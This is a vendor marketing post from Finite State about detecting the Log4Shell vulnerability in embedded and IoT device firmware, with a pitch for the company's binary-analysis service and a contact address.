Log4j in Your Embedded Products? Find It Before Attackers Do

From the Finite State Vulnerability & Threat Intelligence Team: Unsure if your IoT or embedded devices are vulnerable to Log4j flaws? Let us help you ASAP – these are easily exploitable vulnerabilities that need urgent detection and remediation. Talk to us at Log4j@finitestate.io to get on the fast-track to remediating Log4j vulnerabilities in all your products.

The flaw in Log4j’s code (called Log4Shell) allows remote code execution by unauthorized users. A critical vulnerability in widespread logging utility used in nearly every Java application, the Log4Shell CVE represents a potential nightmare scenario for businesses using impacted software. As news of the vulnerability (listed as CVE 2021-44228) spread, many businesses were relieved to discover that simple patches and mitigations applied to web applications can prevent potential attackers from exploiting the vulnerability.

However, this advice doesn’t apply to software embedded in the firmware of devices that can – and often do – use Log4j. Embedded and connected devices in many critical industries are developed with Java, and frequently make use of embedded Java servers. 

At Finite State, we knew a Log4j vulnerability would be an issue for embedded devices for a simple reason: we searched our extensive firmware libraries for it, and immediately uncovered pervasive issues in devices used across numerous industries.

Our advanced analysis of firmware binaries for embedded and connected devices made it possible to detect Log4j with a single click and search. Because the Finite State platform works by analyzing binaries directly, this process can be automated and inclusive of every component and subcomponent in embedded devices.

If you manufacture any embedded products, even detecting the presence of Log4j in each of your SKUs and firmware versions can be extremely time-consuming. When our research team discussed manual processes with major manufacturers, we found it usually takes 2-8 weeks to uncover whether a vulnerability impacts product lines. At Finite State, we can shorten that process so that it takes seconds to identify the presence of new vulnerabilities as soon as they are discovered.

Those weeks translate to a massive head start for attackers, and we know that many companies want to know now whether this vulnerability is impacting their devices (and if so, which ones). Manufacturers of devices used in healthcare or critical infrastructure – we hear your urgent needs and we are ready to help.

If you want to determine whether your products may contain Log4j, our teams can evaluate your binaries quickly and give you an answer fast. Contact Log4j@finitestate.io and let us know what products you’d like to evaluate and we can get you started ASAP.